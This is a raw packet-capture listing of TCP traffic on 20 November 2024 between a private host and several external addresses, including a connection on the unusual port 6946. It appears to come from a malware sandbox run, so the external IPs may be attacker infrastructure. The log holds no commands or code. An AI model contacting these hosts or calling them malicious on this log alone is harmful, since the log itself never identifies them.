                                                                                                            Nov 20, 2024 16:58:13.967107058 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.967123032 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.967134953 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.970125914 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.970138073 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.970175028 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.970189095 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.970199108 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.972875118 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.972891092 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.972928047 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.972939014 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.974019051 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.974076033 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.974085093 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.976533890 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.976588964 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.976598024 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.979516029 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.979561090 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.979573011 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.982604980 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.982661963 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.982676983 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.986531019 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.986593008 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.986613989 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.990170956 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.990225077 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.990242004 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.992889881 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.992940903 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.992954016 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.996063948 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.996124983 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.996134996 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.999834061 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.999890089 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.999902010 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.002906084 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.002955914 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.002966881 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.006150961 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.006232023 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.006247997 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.158674955 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.158812046 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.158832073 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.160975933 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.160988092 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.161014080 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.161036968 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.161058903 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.161127090 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.164865017 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.164882898 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.164926052 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.164971113 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.164971113 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.167957067 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.167980909 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.168039083 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.168039083 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.168059111 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.171107054 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.171154022 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.171210051 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.171230078 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.171372890 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.174886942 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.174909115 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.174977064 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.174995899 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.177902937 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.177980900 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.177998066 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.181253910 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.181334972 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.181349993 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.184937954 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.185173035 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.185193062 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.188251972 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.188338041 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.188355923 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.191354036 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.191446066 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.191462040 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.194554090 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.194638014 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.194654942 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.198357105 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.198479891 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.198496103 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.201560974 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.201639891 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.201656103 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.204385996 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.204502106 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.204518080 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.208904028 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.209054947 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.209069014 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.360426903 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.360549927 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.360589027 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.362508059 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.362531900 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.362550974 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.362603903 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.362603903 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.362657070 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.362763882 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.366399050 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.366420031 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.366492033 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.366492033 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.366533995 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.369352102 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.369389057 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.370601892 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.370623112 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.370759964 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.372385979 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.372406006 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.372700930 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.372718096 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.376211882 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.378587008 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.378593922 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.380517960 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.381124020 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.381133080 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.383187056 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.383255959 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.383264065 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.386231899 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.386559010 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.386569023 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.389518976 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.390588999 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.390595913 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.392858028 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.392972946 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.392982006 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.395901918 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.396037102 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.396044970 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.399693012 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.400628090 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.400636911 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.403037071 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.403347969 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.403354883 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.406636953 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.407341003 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.407350063 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.409930944 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.410149097 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.410156965 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.561197996 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.561355114 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.561403036 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.564543962 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.564548016 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.564694881 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.564754009 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.564778090 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.564959049 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.571155071 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.571166992 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.571187973 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.571239948 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.571239948 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.574337006 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.574345112 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.574419975 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.574436903 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.578962088 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.578993082 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.579034090 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.579052925 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.579250097 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.581985950 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.581993103 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.582063913 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.582077980 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.582127094 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.582375050 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.582386971 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.585422993 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.585498095 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.585514069 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.588238001 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.588311911 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.588325024 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.590895891 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.591029882 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.591043949 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.591644049 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.591763020 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.592288017 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:15.031200886 CET694649176192.3.101.149192.168.2.22
                                                                                                            Nov 20, 2024 16:58:15.230868101 CET491766946192.168.2.22192.3.101.149
                                                                                                            Nov 20, 2024 16:58:15.284429073 CET694649176192.3.101.149192.168.2.22
                                                                                                            Nov 20, 2024 16:58:15.288453102 CET491766946192.168.2.22192.3.101.149
                                                                                                            Nov 20, 2024 16:58:15.408087015 CET694649176192.3.101.149192.168.2.22
                                                                                                            Nov 20, 2024 16:58:15.408147097 CET491766946192.168.2.22192.3.101.149
                                                                                                            Nov 20, 2024 16:58:15.528150082 CET694649176192.3.101.149192.168.2.22
                                                                                                            Nov 20, 2024 16:58:15.762100935 CET694649176192.3.101.149192.168.2.22
                                                                                                            Nov 20, 2024 16:58:15.770500898 CET491766946192.168.2.22192.3.101.149
                                                                                                            Nov 20, 2024 16:58:15.891777992 CET694649176192.3.101.149192.168.2.22
                                                                                                            Nov 20, 2024 16:58:15.969449997 CET694649176192.3.101.149192.168.2.22
                                                                                                            Nov 20, 2024 16:58:16.244914055 CET491766946192.168.2.22192.3.101.149
                                                                                                            Nov 20, 2024 16:58:17.565862894 CET4917780192.168.2.22178.237.33.50
                                                                                                            Nov 20, 2024 16:58:17.685580969 CET8049177178.237.33.50192.168.2.22
                                                                                                            Nov 20, 2024 16:58:17.685702085 CET4917780192.168.2.22178.237.33.50
                                                                                                            Nov 20, 2024 16:58:17.770757914 CET4917780192.168.2.22178.237.33.50
                                                                                                            Nov 20, 2024 16:58:17.890424013 CET8049177178.237.33.50192.168.2.22
                                                                                                            Nov 20, 2024 16:58:19.031322002 CET8049177178.237.33.50192.168.2.22
                                                                                                            Nov 20, 2024 16:58:19.031413078 CET4917780192.168.2.22178.237.33.50
                                                                                                            Nov 20, 2024 16:58:19.124666929 CET491766946192.168.2.22192.3.101.149
                                                                                                            Nov 20, 2024 16:58:19.251869917 CET694649176192.3.101.149192.168.2.22
                                                                                                            Nov 20, 2024 16:58:20.042874098 CET8049177178.237.33.50192.168.2.22
                                                                                                            Nov 20, 2024 16:58:20.042937040 CET4917780192.168.2.22178.237.33.50
                                                                                                            Nov 20, 2024 16:58:27.964181900 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:28.083915949 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:28.083993912 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:28.084156036 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:28.203808069 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.247379065 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.247396946 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.247410059 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.247423887 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.247437000 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.247448921 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.247461081 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.247474909 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.247488976 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.247487068 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.247504950 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.247513056 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.247528076 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.247694016 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.369322062 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.369458914 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.369527102 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.373313904 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.444989920 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.445043087 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.445085049 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.449233055 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.449275970 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.449338913 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.457583904 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.457627058 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.457663059 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.466676950 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.466723919 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.466728926 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.474317074 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.474354982 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.474464893 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.482747078 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.482791901 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.482851982 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.491096020 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.491139889 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.491147041 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.499485016 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.499531031 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.499620914 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.507982969 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.508024931 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.508666992 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.516249895 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.516285896 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.516330004 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.565313101 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.565329075 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.565382957 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.646271944 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.646332026 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.646342039 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.648921967 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.648957014 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.648969889 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.654017925 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.654066086 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.654105902 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.659028053 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.659071922 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.659112930 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.664159060 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.664221048 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.664226055 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.669380903 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.669435978 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.669498920 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.674679995 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.674731016 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.674915075 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.679868937 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.679920912 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.679928064 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.685168982 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.685264111 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.685292959 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.690210104 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.690284014 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.690289021 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.695417881 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.695492029 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.695523977 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.700607061 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.700685024 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.700695038 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.704858065 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.704925060 CET4917880192.168.2.22192.3.220.29
